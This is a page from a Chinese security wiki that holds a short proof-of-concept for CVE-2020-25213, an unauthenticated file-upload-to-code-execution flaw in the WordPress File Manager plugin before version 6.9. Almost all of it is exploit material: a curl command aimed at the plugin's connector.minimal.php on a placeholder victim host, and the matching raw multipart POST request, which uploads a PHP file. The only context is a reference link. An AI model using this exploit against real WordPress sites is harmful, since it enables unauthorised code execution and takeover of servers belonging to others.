menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right Vulnerability-棱角社区(Vulnerability)项目漏洞-20210715 chevron_right WordPress File Manager < 6.9 RCE(CVE-2020-25213)PoC.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    WordPress File Manager < 6.9 RCE(CVE-2020-25213)PoC.md
    1.17 KB / 2021-05-21 09:14:38
        # WordPress File Manager < 6.9 RCE(CVE-2020-25213)PoC
    
    
    [Proof Of Concept]
    
    
    ```bash
    curl -ks --max-time 5 -F "reqid=17457a1fe6959" -F "cmd=upload" -F "target=l1_Lw"  -F "mtime[]=1576045135" -F "upload[]=@/$file_upload" "hxxps://victim.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"
    ```
    
    
    ```bash
    POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1
    Content-Length: 631
    Content-Type: multipart/form-data; boundary=------------------------9689147a5989a801
    Connection: close
    
    --------------------------9689147a5989a801
    Content-Disposition: form-data; name="reqid"
    
    17457a1fe6959
    --------------------------9689147a5989a801
    Content-Disposition: form-data; name="cmd"
    
    upload
    --------------------------9689147a5989a801
    Content-Disposition: form-data; name="target"
    
    l1_Lw
    --------------------------9689147a5989a801
    Content-Disposition: form-data; name="mtime[]"
    
    1576045135
    --------------------------9689147a5989a801
    Content-Disposition: form-data; name="upload[]"; filename="1.php"
    Content-Type: application/octet-stream
    
    <?php phpinfo();?>
    
    --------------------------9689147a5989a801--
    ```
    
    ref:
    
    https://forum.ywhack.com/thread-1645-1-7.html
    
    links
    file_download